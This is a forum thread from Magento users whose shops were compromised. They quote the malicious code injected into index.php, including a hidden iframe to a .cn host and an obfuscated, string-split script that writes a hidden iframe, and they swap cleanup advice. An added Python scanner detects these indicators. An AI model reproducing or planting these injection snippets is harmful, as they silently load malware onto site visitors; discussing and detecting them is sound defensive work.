Magento Forum

   
iFrame hack? Can’t access website or admin anymore… HELP Please
 
Loek
Jr. Member
 
Total Posts:  23
Joined:  2009-05-04
 

Hello,

Today I went to the office and our webshop ( www . elout . eu ) doesn’t work anymore… Also I can’t access the admin panel anymore…

When I’m opening our homepage the following error is shown:

Parse error: syntax error, unexpected ‘<’ in /home/theproje/domains/elout.eu/public_html/index.php on line 54

When I opened the index.php file I saw these lines:

51 mask(0);
52 Mage::run();
53
54 <iframe src="http://superlottry.cn:8080/ts/in.cgi?pepsi41" width=125 height=125 style="visibility: hidden"></iframe>

When I removed line 54 nothing happened (I’ve deleted the cache) ....

Anybody here who knows how to solve this problem??

We are using magento for two weeks. Is our website already hacked?

 
 
Loek
Jr. Member
 
Total Posts:  23
Joined:  2009-05-04
 

Thank you for your reply!

I removed the lines with superlottry in it and the site is working again.

Can you tell me how I can secure the website so that it won’t happen again?

Do I need to change admin passwords, ftp passwords or something?

Greets

 
 
AFemaleProdigy
Jr. Member
 
Total Posts:  13
Joined:  2009-02-18
 

I believe this is a problem with Magento, not with the hosting server.  I too have experienced the same exact thing.... TWICE! 

I installed magento the first time and shortly after… wham!  My index page was giving me the same error. So I opened up the file and found new code that shouldn’t be there.  Removing the code did not fully fix the problem.  I had to upload a fresh copy of the index file because some of the last lines of the default code had been deleted.  Admin area would not let me log in.  Resetting password would not work.  The tutorials here did not work.  I tried re-uploading EVERYTHING which took forever.  Still… it wouldn’t work.  After talking to some people, everyone convinced me my server must have been compromised.  So, we moved to another server, I changed all passwords (complicated passwords) to everything, including the database.  I completely removed the entire site and reinstalled (since it was a new installation anyway).  I figured better safe to make sure I didn’t miss anything.

So, a few weeks go by with the clean install and new passwords and guess what… same thing happened again!  I just noticed it.  So I uploaded a fresh copy of index again, but my admin area is acting weird.  I was able to log in this time, but none of the navigation links in admin are working.

Something is wrong here and it’s not the server.  PLEASE… someone help us out here.  I have a feeling more people will be complaining about this if it’s some sort of exploit or flaw in the Magento code.

 
 
gfxguru
Sr. Member
 
Total Posts:  186
Joined:  2008-11-20
 

Glad I’m not the only person that has run into this. I’m removing magento for now. This is a serious security issue! and in no way am I going to compromise other merchants on our servers. Not to mention magento is a true resource hog. Get a site with 10-15 people on it and it’s done.

 
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

We went through 3 months of fighting a hack on our magento install. 
Every time we changed our password within a couple of days we were hacked again.
Added a lot of security code to our .htaccess file.  Didn’t help.

We finally had to have our ISP close down our account and open a new one and reinstall everything.

We have not reinstalled magento.

We got hacked the first time within 2 days of installing magento.  Never had been hacked in 5 years.

 
 
SSmeredith
Jr. Member
 
Total Posts:  4
Joined:  2009-03-12
 

I can’t speak for Magento as I have yet to install, except for a temporary demo install a few months back.  Anyway, I had this same problem with Joomla!  for the last month.  The iframe malicious code injection was a downright nightmare - and it spread to all of my sites.

There were issues on my part and my hosts. 

You can keep fixing that index file but I can promise you it will come back if you don’t take any precautions. 

First - you should consider that you put it there from your own pc.  So I started with malwarebytes.com and the hijackthis and got rid of few trojans - who knew. 

Then you need to pass protect your admin folder through the cpanel option or whatever - so basically you have to login twice to use the admin interface.  That helps a lot.  But again, if the virus is already in there, changing the pwds won’t help until you can get it out.

So use your ftp to see the dates of last access files - look for your folders that have an index.html ( which the viruses reside like the one mentioned above and you can double check from your original files and remove those looong number sequences, in Joomla anyway, not familiar with Mage to say for sure ) and then also the folders with the added .htaccess and random number .php file like this:  BTW, I had 2,692 of these files to remove plus each one with an .htaccess to delete as well.  Ouch.

.htaccess
556386.php

A robot hits on a nonexistent file, the little buggers, and “looks” in the htaccess file which shows an error redirect to the .php file which refers back to ......  WHERE??  exactly. 

So, you have to have your host run a clamscan or something on everything.  And they won’t even catch the .php files most likely.  Don’t even bother changing them until you find the script that it goes with.  Mine was found running under Usage.php which looked like it belonged but clearly did not so that was immediately deleted.

Oh and make sure your host is running the latest on Apache and Php.  And hope your existing installs are compatible.

And another way to check is unusually high bandwidth for a site you know isn’t getting that much traffic.  There are also randomly named folders with funny names like ‘water’ or ‘catch’ added that contain, get this - images like you get when you get spammed with drug and pill spams. Well they’re using your bandwidth to host those images!  And you’re getting blacklisted. 

Now I know this is a lot and I’m not very organized in my thoughts here but that’s about how it felt going through this.  And I’m pretty sure there were multiple types of injections in the sites for different purposes.  If it was only one type then wow, it’s a pretty complex virus/trojan whatever.

So..... while I’m now convinced anything written in php is pretty much up for grabs by crackers, let’s not lay the blame totally with Magento as Joomla has the same problems and probably many more - still can’t figure out why people are flocking to PHP?  And yes, I guess I’m a glutton for punishment because I’m going back for more and will continue to use both Magento and Joomla again until a viable yet affordable language comes along ;)

Good luck and make a checklist for your host and yourself to get through the process. Keeps down on the runaround.

The totally depleted but not defeated -
M

 
 
J_T_
Moderator
 
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

I bet the people with these issues are using Magento Connect with all the open file permissions it requires.

It would be interesting if Varien could make a comparison of hosting environments and Magento configuration to confirm or dismiss what this was due to.

 
 
Sensi
Sr. Member
 
Total Posts:  103
Joined:  2008-07-31
Paris, France
 

See http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ among others. This malware seems to hack into your computer via your browser with an infected PDF (targeting Acrobat reader) or flash file, steal your saved FTP passwords from well-known FTP programs and then infect your websites.

People should check that their PCs aren’t infected, disable register global on their server, check their file permissions, etc. And of course change their hosting solution -at least configure it properly, shared hosting isn’t an option- if they claim that it can’t handle 10 users over magento. ;)

 
 
J_T_
Moderator
 
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Unless you have real visitors from China, I guess you could also blanket block Chinese IPs or anything .cn by hostname. There are plenty of websites that list all current IP address blocks of an entire nation and I’ve used those for one non-Magento site to stop blog spam effectively (Blocked China and Ukraine).

Anyway, it seems to me this indeed isn’t a Magento issue but as it appears, compromised passwords. Changing your FTP credentials and deleting your FTP programs should be a good step in the right direction.

 
 
piotrekkaminski
Member
 
Total Posts:  73
Joined:  2007-09-01
 

Hello,

Please see similar issue, also caused by malware, here:
http://www.magentocommerce.com/boards/viewthread/41070/#t133175

Thanks

 
 
vikshu
Member
 
Total Posts:  69
Joined:  2009-04-09
Noida
 

I too am facing the same problem. My index.php was hacked last week, I replaced it with a fresh one and applied a password to my site. But today again it was hacked with the following code in line 51 of index.php.

Mage::run('default');<?php echo ''?><?php echo '<script>[removed]("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'?>

Please someone suggest how to get rid of this thing. If this is the security of magento then I am really worried.

Please give me a solution to get rid of this issue
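
An added example, not part of any post in this thread: a small Python scanner for the three indicators posters describe above (a hidden iframe appended to index.php, the same tag split into concatenated string fragments, and a directory holding an .htaccess next to an all-digit .php file). The function names, size thresholds and file extensions are assumptions made for illustration, and a match is a heuristic to review against a clean copy, not proof of compromise.

```python
import os
import re
import sys

# Heuristics for the indicators quoted in this thread (assumed thresholds).
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(visibility\s*:\s*hidden|display\s*:\s*none|"
    r"(width|height)\s*=\s*[\"']?[0-2]\b)", re.I)
# Characters the split-string trick puts between fragments of the tag.
CONCAT_NOISE = re.compile(r"""["'+\s\\]""")
NUMERIC_PHP = re.compile(r"^\d+\.php$")
TEXT_EXT = (".php", ".phtml", ".html", ".htm", ".js")


def scan_text(text):
    """Return the names of the indicators found in one file's contents."""
    hits = []
    if HIDDEN_IFRAME.search(text):
        hits.append("hidden-iframe")
    # Undo string concatenation; flag a tag that only appears once joined.
    collapsed = CONCAT_NOISE.sub("", text).lower()
    if "<iframesrc=" in collapsed and not re.search(r"<iframe\s", text, re.I):
        hits.append("concatenated-iframe")
    return hits


def scan_tree(root):
    """Walk a web root and return {path: [indicators]} for review."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        # .htaccess beside an all-digit .php file: the redirect pair.
        numbered = sorted(f for f in files if NUMERIC_PHP.match(f))
        if ".htaccess" in files and numbered:
            findings[dirpath] = ["htaccess+numeric-php: " + ", ".join(numbered)]
        for name in files:
            if not name.lower().endswith(TEXT_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in sorted(scan_tree(root).items()):
        print(path, "->", "; ".join(hits))
```

Run it with the web root as the only argument, then compare each flagged file with the copy from the original Magento package before deleting anything.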

 
 
fr0x
Member
 
Total Posts:  59
Joined:  2009-05-20
 

As was posted in this thread:
http://www.magentocommerce.com/boards/viewthread/41070/#t133175

It isn’t an issue with magento but rather you (or someone with ftp access) had their passwords stolen via malware/virus/trojan.  Reset your FTP passwords (and run a virus scan on your PCs that have accessed Magento).

It seems rather to be related to FTP passwords being stolen by malware installed on your computer. Please check http://www.abelcheng.com/my-sites-are-hacked-–-heres-how-i-fixed-it/

A few free scanners:
http://www.eset.com/download/free_trial_download.php
http://housecall.trendmicro.com/

 
 
secure site
Jr. Member
 
Total Posts:  1
Joined:  2009-07-07
 

If you are having trouble removing the scripts from your pages and/or getting your site back into Google’s good graces, you might want to check out http://www.iframehack.com .  Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the “attack site” label removed.

Hope this helps someone!

 
 
vikshu
Member
 
Total Posts:  69
Joined:  2009-04-09
Noida
 

Thanks,

I have retrieved back the access of my site. Have changed the FTP passwords and all.
Isn’t there some foolproof solution for it?
I read somewhere about using htaccess file. Can someone please tell me how it is done?
Please this is very important.

 
 
fr0x
Member
 
Total Posts:  59
Joined:  2009-05-20
 

http://www.google.com/search?&q=restrict+ftp+to+ip

I would assume one of those would help you (depending on your server setup).

 
 
gfxguru
Sr. Member
 
Total Posts:  186
Joined:  2008-11-20
 

Uh, you are wrong about the FTP passwords access. I’ve seen this on our server and we don’t have FTP running.

 